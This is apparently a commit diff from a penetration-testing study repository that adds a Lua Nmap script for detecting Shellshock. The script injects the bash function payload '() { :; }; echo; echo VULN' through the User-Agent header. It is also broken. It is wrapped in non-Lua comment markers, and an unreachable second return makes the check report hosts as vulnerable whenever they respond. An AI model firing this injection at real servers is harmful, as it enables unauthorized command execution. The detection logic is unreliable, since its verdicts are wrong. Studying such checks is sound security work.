refactored. 01-02-03 done

02-pentest/02-vuln/02-openvas/01-shellshock/123

@@ -0,0 +1,20 @@
+/*local http = require "http"
+local stdnse = require "stdnse"
+local shortport = require "shortport"
+local output = stdnse.output_table()
+
+local function check(host, port, url)
+  local payload = "() { :; }; echo; echo VULN"
+  local response = http.get(host, port, url,  { ["header"] = { ["User-Agent"] = payload } })
+  output = response
+  return output
+  return response and response.body and response.body:find("VULN")
+end
+
+portrule = shortport.http
+
+action = function(host, port)
+  local url = stdnse.get_script_args("url")
+  local vulnerable = check(host, port, url)
+  return string.format("Host %s:%s/%s is %s vulnerable to Shellshock", host.ip, port.number, url, vulnerable and "" or " NOT", url)
+end */